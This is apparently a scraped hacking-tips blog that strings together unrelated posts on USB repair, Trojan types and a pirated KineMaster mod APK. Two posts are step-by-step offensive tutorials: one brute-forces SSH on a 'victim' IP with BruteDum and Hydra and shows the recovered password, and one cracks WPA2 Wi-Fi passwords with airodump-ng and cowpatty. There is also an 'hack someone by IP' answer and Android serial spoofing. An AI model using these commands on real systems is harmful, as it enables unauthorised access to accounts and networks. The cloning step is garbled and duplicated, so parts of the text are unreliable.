Uncategorized

How To Fix Pen Drive Empty Problem Even The Drive Is Full

How To Fix Pen Drive Empty Problem Even The Drive Is Full
 The method is straight and simple, and you don’t need any technical knowledge, you just need a simple command entering that will easily fix out the issue of loss of files in Pendrive. Follow the methods discussed below. 
Method : New Drive Letter
Sometimes due to some hardware/software issue, our computer fails to recognize the hard drive and even if it does. It might show you some problem like empty USB drive even if the drive is full. So, here Assigning New drive letter might fix your problem and it is an easy task. So, make sure to apply this method first to check whether it’s working or not in your case. If it works, then you don’t need to go through the next methods.
1 First of all, reinsert your USB drive on your computer and then right click on ‘My Computer’ and then click on ‘Manage.’
2  beow you will get to see many options in Computer Management. Here you need to select the option ‘Disk Management.’
3 Now you need to find your USB drive and then right-click on it and select the option ‘Change Drive Letters and Paths’
4 Now you will be asked to choose a drive letter or Path. Simply select your drive letter and click ‘Ok’ button.
That’s it! Now remove your USB drive and reinsert it and check whether files inside your USB drive are showing or not. 
Uncategorized

How To Brute-Force SSH, FTP, VNC & More with BruteDum

How To Brute-Force SSH, FTP, VNC & More with BruteDum 
#hackingtutorials
Brute-forcing is an easy way of discovering weak login credentials and is often one of the first steps when a hacker finds network services running on a network they gain access to. 
For beginners and experienced hackers alike, it\’s useful to have access to the right tools to discover, classify, and then launch customized brute-force attacks against a target. 
BruteDum does it all from a single framework.
 Weak Passwords Are Easy Prey 
When a hacker gains access to a system with services running on it, one of the first things they\’ll typically do is see if they can log in to any of those services using default or common credentials. 
Internet of Things (IoT) hardware and devices like routers are often left with default passwords enabled, making them easy to attack.
To test the services they discover for weak passwords, the hacker needs to select the right tool for the job, and it can be confusing to know which tool is the best to use against a particular service.
BruteDum is a Python tool that allows a hacker to acquire a target first and run a scan inside the framework to determine the best tool based on what is discovered. 
It\’s easy to run a brute-force or dictionary attack against nearly any standard protocol that\’s vulnerable to it.
The advantage of running BruteDum over specific tools is the ability to run a scan from within to identify what other processes may be running on the same device, as well as organizing powerful tools for breaking into user accounts on services like SSH.
Online or Connected Attacks 
Unlike attacks launched against WPA networks where we can grab a hash and attempt cracking later, we need to be connected to our target directly over the network to try a brute-forcing or dictionary attack. 
While there are ways of hiding our identity with a VPN or Tor, brute-force and dictionary attacks can be limited in effectiveness through a variety of different means.
One way of limiting brute-force and dictionary attacks is through rate-limiting, in which a lockout is triggered after a set amount of incorrect login attempts. 
That, combined with flagging suspicious login attempts, can make brute-force and dictionary assaults more likely to alert a target that they are under attack.
To execute an online dictionary attack, we\’ll be using THC Hydra, Medusa, or Ncrack against the services we discover, using BruteDum to scan and organize our attacks between these tools. 
We\’ll also need a password list, which will be critical to the success or failure of our dictionary attack. 
If the password list is too large, it will take too long to attack the network, and if it isn\’t reasonably long enough to contain the password, we run the risk of it not being in the list, causing the attack to fail.
What You\’ll Need 
To follow this guide, you\’ll need Python3 installed on your system. 
Also, I recommend using Kali Linux, as it should have most of the required programs installed by default. If you\’re doing this on another system, you\’ll need to make sure that you have all the prerequisite programs installed.
If you\’re not using Kali Linux, you can use Ubuntu or Debian, but you\’ll need to make sure you have Hydra, Medusa, and Ncrack installed. 
You\’ll also need Nmap for scanning.
We\’ll also need a password list to test, and in this case, we\’ll be downloading it to a folder we create later. 
If you have a favorite password list, you\’ll need to copy it to the folder we\’ll be making.
Step 1 
 Download & Set Up BruteDum 
To get started, we\’ll need to download the repository from GitHub. 
In a new terminal window, you can type in the following command to clone the repo.
Command :-
/BruteDum Cloning into \’BruteDum\’… remote: Enumerating objects: 15, done. remote: Counting objects: 100% (15/15), done. remote: Compressing objects: 100% (14/14), done. remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (15/15), done.
And this one to navigate into the directory :-
command to clone the repo.
Command :-
/BruteDum Cloning into \’BruteDum\’… remote: Enumerating objects: 15, done. remote: Counting objects: 100% (15/15), done. remote: Compressing objects: 100% (14/14), done. remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (15/15), done.
And this one to navigate into the directory:
Command :-
~$ cd BruteDum
From inside this folder, you\’ll be able to run BruteDum. 
Before we do, we should take care of one small quirk. 
I found that BruteDum couldn\’t find password lists saved outside the BruteDum folder, so the solution seems to be adding our password list directly there. 
To do this, I\’ll simply take one off GitHub, and I\’ll download it to the folder I\’m in using the wget command.
Command. :-
~/BruteDum$ wget https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt –2020-01-10 17:19:59– https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt Resolving raw.githubusercontent.com (raw.githubusercontent.com)… 151.101.0.133, 151.101.64.133, 151.101.128.133, … Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443… connected. HTTP request sent, awaiting response… 200 OK Length: 1620 (1.6K) [text/plain] Saving to: ‘Top207-probable-v2.txt’ Top207-probable-v2. 100%[===================>] 1.58K –.-KB/s in 0s 2020-01-10 17:19:59 (53.3 MB/s) – ‘Top207-probable-v2.txt’ saved [1620/1620]
Once it\’s done, we can run BruteDum by typing the following command.
~/BruteDum$ python3 brutedum.py 888888 888888 BRUTE 8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE 8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST 88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR 88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE 88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES [i] BruteDum – Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack Author:
 https://GitHackTools.blogspot.com [?] Enter the victim address:
Step 2 
Enter the Target Address 
After the loading screen finishes, we\’ll need to enter the IP address of the victim. 
Once you\’ve done so, press Enter, and you\’ll be presented with the option to run an Nmap scan. 
It\’s a handy feature that can help you discover other services open on the same device.
 Type Y and hit Enter to run the Nmap scan.
[?] Enter the victim address: 192.168.43.1 [?] Do you want to scan victim\’s ports with Nmap? [Y/n]: Y
When the results return, you should be able to identify any ports that come back as \”open.\” 
Next, you\’ll need to select a service to crack. 
The menu for doing so is quite easy to understand, and you can choose one that matches the service that our Nmap scan discovered.
[+] Scanning ports with Nmap… Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-10 02:57 PDT Nmap scan report for 192.168.43.1 Host is up (0.0087s latency).
 Not shown: 997 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: ███.███.███.███.███.███ Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds [1] FTP [2] Telnet (Default port is 21) (Default port is 23) [3] PostgreSQL [4] SSH (Default port is 5432) (Default port is 22) [5] RDP [6] VNC (Default port is 3389) (Default port is 5900) [?] Which protocol do you want to crack? [1-6]: 4
In our example, we\’ll select option 4 and hit Enter to indicate we want to do SSH cracking.
 Step 3 
Select the Tool 
Now, we\’ll need to determine the tool we\’ll be using to try cracking the password.
 Depending on what service we selected, BruteDum will recommend one to use.
888888 888888 BRUTE 8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE 8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST 88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR 88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE 88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES [i] BruteDum – Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack Author: https://GitHackTools.blogspot.com [i] Target: 192.168.43.1 Protocol: ssh [1] Ncrack [2] Hydra (Recommended) [3] Medusa [?] Which tool do you want to use? [1-3]: 2
We\’ll select Hydra, as it\’s the one recommended for cracking SSH. Type 2 to indicate Hydra (or the number of the tool you wish to use) and press Enter to begin configuring it.
Step 4 
Set Username & Password Lists 
To launch our attack, we\’ll need to make a time versus probability tradeoff. 
Our first option will be to select a username list. 
That means we\’ll be trying every password in our password list with every username in our username list.
 It can become a lot of attempts very quickly.
In our example, we can select N to decline using a username list. 
Instead, we\’ll use a common username, or one we might know exists by default on the type of device.
[i] Target: 192.168.43.1 Protocol: ssh [?] Do you want to use username list? [Y/n]: N
Because we declined to supply a username list, we\’ll have to enter one manually instead.
 Here, I\’ll enter toor, as I know that\’s the username for our test device.
[?] Enter the username: toor
Next, we\’ll need to set the password list. 
It won\’t work if we select a password list outside of the directory we\’re in, so we can now add the password list we downloaded earlier. 
If you followed along before, we should be able to just paste in the Top207-probable-v2.txt wordlist here.
[?] Enter the path of wordlist: Top207-probable-v2.txt
Step 5 
Launch the Attack 
Finally, we can decide if we want to use the default port or not. 
Some devices may host services on a port other than the standard one, but this isn\’t very common. 
For SSH, the default port is 22, so we\’ll just enter Y and hit Enter.
[?] Do you want to use default port? [Y/n]: Y
If you\’re attacking a service on a non-standard port, you can specify it here and press Enter.
 Do not accidentally type in the number of the port you want to attack here, as the script will crash.
As soon as you supply the port, BruteDum will launch the tool you specified.
[i] Target: 192.168.43.1 Protocol: ssh [+] Hydra is cracking… Hydra v8.8 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes. 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-10 09:23:30 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 208 login tries (l:1/p:208), ~13 tries per task [DATA] attacking ssh://192.168.43.1:22/
After some time to attack the network and try all of the passwords, you\’ll get a result, either revealing the password or reporting that a valid password was not found.
[22][ssh] host: 192.168.43.1 login: toor password: root 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 3 final worker threads did not complete until end. [ERROR] 3 targets did not resolve or could not be connected [ERROR] 16 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-10 10:51:18 [?] Do you want to conitnue? [Y/n]: N
Brute-Force Attacks Find Weak Passwords 
A key thing to remember about brute-force and dictionary attacks is that they are powerful in the right place, but not a silver bullet for breaking into accounts. 
Weak passwords are especially easy to find with BruteDum, but more complicated passwords require longer password lists. 
That issue necessitates prolonged contact with the victim to burn through those longer lists, making the attack less practical and more evident to anyone watching for this kind of attack.
An ideal target for these attacks is primarily IoT devices, which generally have poor security and a plethora of services running with default credentials.
That\’s it I hope u loved the TUTORIAL and enjoyed learning.
Any doubts/probelms then contact me
I am here to help u all..
Keep sharing and Supporting.
Love u all…❤️❤️
Uncategorized

Examples Of Trojan

 Examples Of Trojan 
━━━━━━━━━━━━━ 
Examples of Trojan malware attacks
Trojan malware attacks can inflict a lot of damage. At the same time, Trojans continue to evolve. Here are three examples.
1⃣ Emotet banking Trojan : After a long hiatus, Emotet’s activity increased in the last few months of 2017, according to the Symantec 2018 Internet Security Threat Report. Detections increased by 2,000 percent in that period. Emotet steals financial information, among other things.
2⃣ Rakhni Trojan : This malware has been around since 2013. More recently, it can deliver ransomware or a cryptojacker (allowing criminals to use your device to mine for cryptocurrency) to infected computers. “The growth in coin mining in the final months of 2017 was immense,” the 2018 Internet Security Threat Report notes. “Overall coin-mining activity increased by 34,000 percent over the course of the year.”
3⃣ ZeuS/Zbot : This banking Trojan is another oldie but baddie. ZeuS/Zbot source code was first released in 2011. It uses keystroke logging — recording your keystrokes as you log into your bank account, for instance — to steal your credentials and perhaps your account balance as well.
━━━━━━━━━━━━━
Uncategorized

What is Ethical Hacking certification

What is Ethical Hacking certification?
▪️This is a qualification obtained by evaluating the security of computer systems, using penetration testing methods. This certification qualifies an individual as a certified ethical hacker. It helps you think like a hacker. There are multiple benefits of holding an ethical hacking certification:
▪️It helps understand risks and vulnerabilities affecting the organizations on a daily basis.
It shows the tools of trade. Your misconceptions about hacking will definitely be solved. That is, after this certification, you will get a general idea about how and what a white hacker’s job role will be.
Also, you’ll understand that the concept of hacking is much more than just merely hacking into another individual’s Facebook or email accounts.
Through this certification, you will learn various types of foot-printing, countermeasures and foot-printing tools. You can also discover what packet sniffing methods are and how to shield against sniffing.
This cert will teach you the network scanning and enumeration techniques as well as network scanning and enumeration countermeasures. As an ethical hacker certification holder, you can also develop your skill in Trojans, Trojan countermeasures and Trojan analysis.
You will develop your knowledge in the field of system hacking and hijacking methods, steganography, steganalysis, covering tracks, virus analysis, the working of viruses, malware analysis procedure, computer worms and countermeasures.
And finally, you’ll learn how the exploits evolve.
Uncategorized

Steps To Change Serial Number of Your Android

Steps To Change Serial Number of Your Android:

First of all you need a rooted android as Xposed installer can be only installed on a rooted android, so Root your android to proceed .
  2. After rooting your android device you have to install the Xposed installer on your android
  3. Now after having Xposed framework on your android, the only thing you need is the Xposed module Serial Number Changer that will allow you to change the serial number of your android device.
  4. Now install the app and launch it in your android and you just need to provide super user access to the app to proceed and after that you need to reboot your android device for the proper working of the android.
  5. Now launch the app and then enter the serial number that you want to set on your device.
Uncategorized

How to remove malware\’s using cmd

How to remove malware\’s using cmd
Step 1. Open Command Prompt from search and run as an administrator.
Step 2. Type D: and press Enter.
Step 3. Type attrib and press Enter. You\’ll see autorun.inf virus listed.
Step 4. To remove virus using CMD, type into your command prompt attrib -r -a -s -h *.* and press Enter. This will remove the Read Only, Archive, System and hidden file attribute from all the files. (*.* for all the files with all different types of file extensions).
Step 5. Type del autorun.inf and enter, to delete the files
Uncategorized

How do I hack someone computer or mobile by his/her ip address?

How do I hack someone computer or mobile by his/her ip address?
First of all you need to know the difference between the two types of ip address,i.e.
 static ip and dynamic ip.
 Most of the people doesn\’t have a static ip. Only some big organization or companies have static ip address. On the other hand almost every common person have dynamic ip connection. Dynamic ip means that, every time you disconnect and reconnect to the internet, your system is assigned a completely new ip address.
 Whereas in static ip, it doesn\’t matter how many times you reconnect to the internet, your ip would be the same everytime
If you are planning to attack someone who is having a static ip connection then you can move on. But if the victim is having a dynamic ip connection then you can not guess the validity of that ip.
 In this case if the victim disconnects and reconnect to the internet then you have to obtain the ip address once again. So i think you got the differences between the two types of ip address by now.
Now back to the question. Even if you have the victim\’s ip address, its not going to help you unless there is a backdoor in the victim\’s system. By backdoor, i mean an open port that can listen to and reply back to your data packets. This can even be done if there is a vulnerable application present in victim\’s system. The best example of a backdoor is something known as the trojan horse or RAT standing for remote administration tool. So i think you\’ve got answer to your question.
Uncategorized

Hᴏᴡ Tᴏ Rᴇᴘᴀɪʀ Cᴏʀʀᴜᴘᴛᴇᴅ Mᴇᴍᴏʀʏ Cᴀʀᴅ/USB Pᴇɴ Dʀɪᴠᴇ

Hᴏᴡ Tᴏ Rᴇᴘᴀɪʀ Cᴏʀʀᴜᴘᴛᴇᴅ Mᴇᴍᴏʀʏ Cᴀʀᴅ/USB Pᴇɴ Dʀɪᴠᴇ
Tʜᴇ Mᴇᴛʜᴏᴅ ɪs ʙᴀsᴇᴅ ᴏɴ ᴀɴ ᴜɴᴄᴏᴍᴘʟɪᴄᴀᴛᴇᴅ ᴄᴏᴍᴍᴀɴᴅ ᴘʀᴏᴍᴘᴛ ᴛʀɪᴄᴋ ᴛʜᴀᴛ ᴡɪʟʟ ғᴏʀᴄᴇ ғᴏʀᴍᴀᴛ ʏᴏᴜʀ ᴇxᴛᴇʀɴᴀʟ ᴅʀɪᴠᴇ, ᴀɴᴅ ᴛʜᴇɴ ʏᴏᴜ ᴄᴀɴ ᴜsᴇ ɪᴛ sᴍᴏᴏᴛʜʟʏ ᴀɴᴅ ᴇʀʀᴏʀ-ғʀᴇᴇ. Hᴏᴡᴇᴠᴇʀ, ɴᴏᴛᴇ ᴛʜᴀᴛ ᴛʜɪs ᴡɪʟʟ ᴅᴇʟᴇᴛᴇ ᴀʟʟ ʏᴏᴜʀ ғɪʟᴇs ғʀᴏᴍ USB ᴘᴇɴ ᴅʀɪᴠᴇ ᴀɴᴅ ɪғ ʏᴏᴜ ʜᴀᴠᴇ ᴀɴʏ ɪᴍᴘᴏʀᴛᴀɴᴛ ᴅᴀᴛᴀ, Tʜᴇɴ ᴜsᴇ ᴛʜᴇ Rᴇᴄᴏᴠᴇʀʏ Tᴏᴏʟ ᴛᴏ ʀᴇsᴛᴏʀᴇ ᴛʜᴇsᴇ ᴅᴀᴛᴀ ʙᴇғᴏʀᴇ ɪᴍᴘʟᴇᴍᴇɴᴛɪɴɢ ᴛʜɪs ᴍᴇᴛʜᴏᴅ. Sᴏ ᴊᴜsᴛ ғᴏʟʟᴏᴡ ᴛʜᴇ sɪᴍᴘʟᴇ sᴛᴇᴘs ᴛʜᴀᴛ I ʜᴀᴠᴇ ᴅɪsᴄᴜssᴇᴅ ʙᴇʟᴏᴡ.
Tᴏᴘ 3 Mᴇᴛʜᴏᴅs ᴛᴏ Rᴇᴘᴀɪʀ:
Cᴏɴɴᴇᴄᴛ Tʜᴇ USB Dᴇᴠɪᴄᴇ Tᴏ Oᴛʜᴇʀ Cᴏᴍᴘᴜᴛᴇʀ.
-> Wᴇʟʟ, ᴡᴇ ᴍᴏsᴛʟʏ ғᴀᴄᴇ SD ᴄᴀʀᴅ ᴏʀ Pᴇɴᴅʀɪᴠᴇ ɪssᴜᴇs ᴅᴜᴇ ᴛᴏ ᴛʜᴇ ɪɴᴄᴏᴍᴘᴀᴛɪʙɪʟɪᴛʏ ᴏʀ ᴀɴʏ ᴏᴛʜᴇʀ ᴅʀɪᴠᴇʀ ʀᴇʟᴀᴛᴇᴅ ɪssᴜᴇ. Sᴏ, ʙᴇғᴏʀᴇ ʏᴏᴜ ᴄᴏɴᴄʟᴜᴅᴇ ᴛʜᴀᴛ ʏᴏᴜʀ USB ᴏʀ SD ᴄᴀʀᴅ ɪs ᴅᴀᴍᴀɢᴇᴅ ᴀɴᴅ ɪᴛs ᴜsᴇʟᴇss, ᴛʀʏ ᴛᴏ ᴄᴏɴɴᴇᴄᴛ ɪᴛ ᴡɪᴛʜ ᴏᴛʜᴇʀ ᴅᴇᴠɪᴄᴇs. Iғ ᴛʜᴇ USB ᴅᴇᴠɪᴄᴇ ᴡᴏʀᴋs ғɪɴᴇ ᴏɴ ᴏᴛʜᴇʀ ᴅᴇᴠɪᴄᴇs, ᴛʜᴇɴ ʏᴏᴜ ɴᴇᴇᴅ ᴛᴏ ᴡᴏʀᴋ ᴏɴ ʏᴏᴜʀ ᴄᴏᴍᴘᴜᴛᴇʀ ʀᴀᴛʜᴇʀ ᴛʜᴀɴ USB ᴏʀ SD ᴄᴀʀᴅ. Sᴏ, ᴛʜɪs ɪs ᴛʜᴇ ᴠᴇʀʏ ғɪʀsᴛ sᴛᴇᴘ ᴛʜᴀᴛ ʏᴏᴜ sʜᴏᴜʟᴅ ᴛᴀᴋᴇ ᴛᴏ ᴄʜᴇᴄᴋ ᴏʀ ʀᴇᴘᴀɪʀ ʏᴏᴜʀ SD ᴄᴀʀᴅ ᴏʀ USB ғʟᴀsʜ ᴅʀɪᴠᴇ.
Usɪɴɢ Tʀᴏᴜʙʟᴇsʜᴏᴏᴛᴇʀ.
-> Wᴇʟʟ, ᴛʀᴏᴜʙʟᴇsʜᴏᴏᴛᴇʀ ɪs ᴛʜᴇ ʙᴇsᴛ ᴡᴀʏ ᴛᴏ sʜᴏʀᴛ ᴏᴜᴛ ᴀɴʏ ᴋɪɴᴅ ᴏғ Hᴀʀᴅᴡᴀʀᴇ ᴘʀᴏʙʟᴇᴍ. Yᴏᴜ ᴊᴜsᴛ ɴᴇᴇᴅ ᴛᴏ \’Tʀᴏᴜʙʟᴇsʜᴏᴏᴛɪɴɢ\’ ɪɴ ᴛʜᴇ sᴛᴀʀᴛ ᴍᴇɴᴜ ᴀɴᴅ ᴛʜᴇɴ ᴜɴᴅᴇʀ \’Hᴀʀᴅᴡᴀʀᴇ ᴀɴᴅ Sᴏᴜɴᴅ\’ sᴇʟᴇᴄᴛ ᴛʜᴇ ᴏᴘᴛɪᴏɴ \’Cᴏɴғɪɢᴜʀᴇ ᴀ Dᴇᴠɪᴄᴇ\’ ᴀɴᴅ ғᴏʟʟᴏᴡ ᴛʜᴇ ᴏɴ sᴄʀᴇᴇɴ ɪɴsᴛʀᴜᴄᴛɪᴏɴ ᴛᴏ sᴏʀᴛ ᴏᴜᴛ ᴀɴʏ ᴘʀᴏʙʟᴇᴍ ʀᴇɢᴀʀᴅɪɴɢ USB ᴅᴇᴠɪᴄᴇ ᴏʀ ᴏᴛʜᴇʀ ʜᴀʀᴅᴡᴀʀᴇ.
Uᴘᴅᴀᴛɪɴɢ USB Dʀɪᴠᴇʀ.
 Iғ Wɪɴᴅᴏᴡs ғᴀɪʟᴇᴅ ᴛᴏ ʀᴇᴀᴅ ʏᴏᴜʀ USB ᴅʀɪᴠᴇ ᴛʜᴇɴ ᴏᴜᴛᴅᴀᴛᴇᴅ ᴅʀɪᴠᴇʀs ᴍɪɢʜᴛ ʙᴇ ᴀɴᴏᴛʜᴇʀ ʀᴇᴀsᴏɴ. Wᴇʟʟ, sᴏᴍᴇᴛɪᴍᴇs ᴜᴘᴅᴀᴛɪɴɢ ᴛʜᴇ ᴅᴇᴠɪᴄᴇ ᴅʀɪᴠᴇʀ ᴄᴏᴜʟᴅ ғɪx ᴀɴʏ ᴇxɪsᴛɪɴɢ ᴘʀᴏʙʟᴇᴍ. Hᴇʀᴇ\’s ʜᴏᴡ ʏᴏᴜ ᴄᴀɴ ᴜᴘᴅᴀᴛᴇ ᴛʜᴇ ᴅᴇᴠɪᴄᴇ ᴅʀɪᴠᴇʀs,
-> Fɪʀsᴛ ᴏғ ᴀʟʟ, ʏᴏᴜ ɴᴇᴇᴅ ᴛᴏ ᴏᴘᴇɴ ᴛʜᴇ RUN ʙᴏx ᴀɴᴅ ᴛʜᴇɴ ᴛʏᴘᴇ ɪɴ ᴅᴇᴠᴍɢᴍᴛ.ᴍsᴄ . Iᴛ ᴡɪʟʟ ᴏᴘᴇɴ ᴜᴘ ᴛʜᴇ Dᴇᴠɪᴄᴇ Mᴀɴᴀɢᴇʀ
-> Nᴏᴡ ʏᴏᴜ ɴᴇᴇᴅ ᴛᴏ ᴇxᴘᴀɴᴅ ᴛʜᴇ Uɴɪᴠᴇʀsᴀʟ Sᴇʀɪᴀʟ Bᴜs Cᴏɴᴛʀᴏʟʟᴇʀs. Hᴇʀᴇ ʏᴏᴜ ᴡɪʟʟ sᴇᴇ ᴛʜᴇ ᴄᴏʀʀᴜᴘᴛᴇᴅ ᴏʀ ᴜɴʀᴇᴄᴏɢɴɪsᴇᴅ USB ᴅᴇᴠɪᴄᴇs ᴀs \’ᴜɴᴋɴᴏᴡɴ Dᴇᴠɪᴄᴇs\’.
-> Rɪɢʜᴛ ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ \’Uɴᴋɴᴏᴡɴ Dᴇᴠɪᴄᴇs\’ ᴀɴᴅ ᴛʜᴇɴ ʏᴏᴜ ᴡɪʟʟ sᴇᴇ ᴛʜᴇ ᴏᴘᴛɪᴏɴ ᴏғ Uᴘᴅᴀᴛᴇ Dʀɪᴠᴇʀ, ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴀᴛ.
 Nᴏᴡ ɪғ ʏᴏᴜ ɴᴇᴇᴅᴇᴅ ᴀɴ ɴᴇᴄᴇssᴀʀʏ ᴜᴘᴅᴀᴛᴇ ɪᴛ ᴡɪʟʟ ʟᴇᴛ ʏᴏᴜ ᴋɴᴏᴡ. Sɪᴍᴘʟʏ ᴜᴘᴅᴀᴛᴇ ɪᴛ ᴀɴᴅ ɪᴛ ᴡɪʟʟ ғɪx ᴀɴʏ ᴇxɪsᴛɪɴɢ ᴘʀᴏʙʟᴇᴍ.
Uncategorized

How to Defend Against Brute-Forcing

How to Defend Against Brute-Forcing
Websites have the best ability to defend against these attacks by making sure to implement common sense brute-forcing safeguards. Should a normal user be able to try to log in with the wrong password from a strange IP address 100 times? The answer is probably no. Be extra careful of websites that don\’t take these sort of precautions, as they will be extra vulnerable to losing your account information.
On the user side, picking strong, random passwords and storing them in a password manager can help make sure your password never ends up in a brute-forcing list. In general, using two-factor authentication whenever possible is your best defense against these sorts of tactics, as you\’ll be alerted of the login attempt. For important accounts, you should always have two-factor authentication enabled.
Uncategorized

Cracking WPA2-PSK (WIFI) [Passwords with Cowpatty]

 Cracking WPA2-PSK (WIFI) [Passwords with Cowpatty

#hackingtutorials
As part of my series on hacking Wi-Fi that has already been posted 
I want to demonstrate another excellent piece of hacking software for cracking WPA2-PSK passwords.
 In this tutorial, we\’ll use a piece of software developed by wireless security researcher Joshua Wright called cowpatty (often stylized as coWPAtty). 
This app simplifies and speeds up the dictionary/hybrid attack against WPA2 passwords For this to work, we\’ll need to use a compatible wireless network adapter.
Step 1 
Find Cowpatty 
Cowpatty is one of the hundreds of pieces of software that are included in the BackTrack suite of software. 
For some reason, it was not placed in the /pentest/wireless directory, but instead was left in the /usr/local/bin directory, so let\’s navigate there.
Command :- 
cd /usr/local/bin
Because cowpatty is in the /usr/local/bin directory and this directory should be in your PATH, we should be able to run it from any directory in BackTrack.
BackTrack will provide you a brief help screen. Take a note that cowpatty requires all of the following.
a word list
a file where the password hash has been captured
the SSID of the target AP
 Step 3 
 Place the Wireless Adapter in Monitor Mode 
Just as in cracking with aircrack-ng, we need to put the wireless adapter into monitor mode.
Command :- 
airmon-ng start wlan0
 Step 4 
Start a Capture File 
Next, we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.
Command :- 
airodump-ng –bssid 00:25:9C:97:4F:48 -c 9 -w cowpatty mon0
This will start a dump on the selected AP (00:25:9C:97:4F:48), on the selected channel (-c 9) and save the the hash in a file named cowcrack.
 Step 5 
Capture the Handshake 
Now when someone connects to the AP, we\’ll capture the hash and airdump-ng will show us it has been captured in the upper right-hand corner.
 Step 6 
 Run the Cowpatty 
Now that we have the hash of the password, we can use it with cowpatty and our wordlist to crack the hash.
Command :- 
cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2
As you can see in the screenshot above, cowpatty is generating a hash of every word on our wordlist with the SSID as a seed and comparing it to the captured hash. 
When the hashes match, it dsplays the password of the AP.
 Step 7 
 Make Your Own Hash 
Although running cowpatty can be rather simple, it can also be very slow. 
The password hash is hashed with SHA1 with a seed of the SSID. This means that the same password on different SSIDs will generate different hashes. 
This prevents us from simply using a rainbow table against all APs. Cowpatty must take the password list you provide and compute the hash with the SSID for each word. 
This is very CPU intensive and slow.
Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password 1000x faster! 
Pre-computed hash files are available from the Church of WiFi, and these pre-computed hash files are generated using 172,000 dictionary file and the 1,000 most popular SSIDs. 
As useful as this is, if your SSID is not in that 1,000, the hash list really doesn\’t help us.
In that case, we need to generate our own hashes for our target SSID. 
We can do this by using an application called genpmk. We can generate our hash file for the \”darkcode\” wordlist for the SSID \”Mandela2\” by typing:
Command :- 
genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2
 Step 8 
Using Our Hash 
Once we have generated our hashes for the particular SSIDs, we can then crack the password with cowpatty by typing:
Command :- 
cowpatty -d hashfile -r dumpfile -s ssid
That\’s it I hope u loved the TUTORIAL and enjoyed learning.
Any doubts/probelms then contact me on @SupremeChucky on telegram
I am here to help u all..
Keep sharing and Supporting.
Love u all…❤️❤️
Uncategorized

Common Types Of Trojan Malware, From A to Z

 Common Types Of Trojan Malware, From A to Z 
━━━━━━━━━━━━━
Here’s a look at some of the most common types of Trojan malware, including their names and what they do on your computer:
Backdoor Trojan
━━━━━━━━━━━━━
This Trojan can create a “backdoor” on your computer. It lets an attacker access your computer and control it. Your data can be downloaded by a third party and stolen. Or more malware can be uploaded to your device.
Distributed Denial of Service (DDoS) attack Trojan
━━━━━━━━━━━━━
This Trojan performs DDoS attacks. The idea is to take down a network by flooding it with traffic. That traffic comes from your infected computer and others.
Downloader Trojan
━━━━━━━━━━━━━
This Trojan targets your already-infected computer. It downloads and installs new versions of malicious programs. These can include Trojans and adware.
Fake AV Trojan
━━━━━━━━━━━━━
This Trojan behaves like antivirus software, but demands money from you to detect and remove threats, whether they’re real or fake.
Game-thief Trojan
━━━━━━━━━━━━━
The losers here may be online gamers. This Trojan seeks to steal their account information.
Infostealer Trojan
━━━━━━━━━━━━━
As it sounds, this Trojan is after data on your infected computer.
Mailfinder Trojan
━━━━━━━━━━━━━
This Trojan seeks to steal the email addresses you’ve accumulated on your device.
Ransom Trojan
━━━━━━━━━━━━━
This Trojan seeks a ransom to undo damage it has done to your computer. This can include blocking your data or impairing your computer’s performance.
Remote Access Trojan
━━━━━━━━━━━━━
This Trojan can give an attacker full control over your computer via a remote network connection. Its uses include stealing your information or spying on you.
Rootkit Trojan
━━━━━━━━━━━━━
A rootkit aims to hide or obscure an object on your infected computer. The idea? To extend the time a malicious program runs on your device.
SMS Trojan
━━━━━━━━━━━━━
This type of Trojan infects your mobile device and can send and intercept text messages. Texts to premium-rate numbers can drive up your phone costs.
Trojan banker
━━━━━━━━━━━━━
This Trojan takes aim at your financial accounts. It’s designed to steal your account information for all the things you do online. That includes banking, credit card, and bill pay data.
Trojan IM
━━━━━━━━━━━━━
This Trojan targets instant messaging. It steals your logins and passwords on IM platforms.
That’s just a sample. There are a lot more.
━━━━━━━━━━━━━
Uncategorized

KineMaster Pro Mod Apk + No Watermark + Unlocked

KineMaster Pro Mod Apk + No Watermark + Unlocked: Today I am going to tell you about one of the Powerful video editing app – KineMaster Mod APK Video Editor. It is one of the best-used apps available today for video editing. Read the full article to know more and to get the download link. 

Click The link To Download
Here is the Latest Version of KineMaster Mod APK for Android Device, Download Now The KineMaster v4.12 Mod Apk.
KineMaster Mod APK
